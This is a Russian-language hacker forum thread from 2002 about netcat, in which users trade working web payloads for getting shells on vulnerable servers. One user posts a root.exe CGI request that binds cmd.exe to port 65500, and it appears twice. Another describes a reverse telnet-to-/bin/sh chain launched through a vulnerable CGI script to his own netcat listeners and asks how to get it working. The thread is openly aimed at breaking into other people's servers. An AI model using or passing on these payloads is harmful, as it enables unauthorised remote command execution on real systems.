может там стоит firewall а может и руки кривоватые ;))) вот пример-если выйдет-напиши
/cgi-bin/scripts/root.exe?/c+nc.exe+-l+-p+65500+-e+cmd.exe
потом ломишься на 65500 порт...кстати есть прога PUTTY намного удобнее телнета.
При установке реверсивного сеанса телнет при помоши дырявого цги скрипта через броузер неткат на моей машине сразу обрывает соеденение. Почему? Фтп устанавливаетя нормально.
Вопрос по netcat11.06.02 13:39 Автор: Zlobnui_Mydak[HitU] <Pr3DV+0Я> Статус: Member
может там стоит firewall а может и руки кривоватые ;))) вот пример-если выйдет-напиши
/cgi-bin/scripts/root.exe?/c+nc.exe+-l+-p+65500+-e+cmd.exe
потом ломишься на 65500 порт...кстати есть прога PUTTY намного удобнее телнета.
Вопрос по netcat12.06.02 16:41 Автор: malunack Статус: Незарегистрированный пользователь
> может там стоит firewall а может и руки кривоватые ;))) вот > пример-если выйдет-напиши > /cgi-bin/scripts/root.exe?/c+nc.exe+-l+-p+65500+-e+cmd.exe > потом ломишься на 65500 порт...кстати есть прога PUTTY > намного удобнее телнета.
Неткат находится на моей машине. Схема такая: в броузере на дырявом сайте я набираю telnet+<мойip>+25+|+/bih/sh+telnet+<мой ip>+80.
На моей машине в двух разных окнах запущено nc -l -n -v -p 25 и
nc -l -n -v -p 80. Тискаю на ввод в броузере и на моем порту 25 неткат пишет, что удаленная машина установила соеденение и сразу же вываливается в шелл. Порты пробовал разные. Если все это делать из командной оболочки
другого удаленного сервера то соеденение на моей машине не рвется.
Што за грабли такие?
а если так?14.06.02 13:26 Автор: Zlobnui_Mydak[HitU] <Pr3DV+0Я> Статус: Member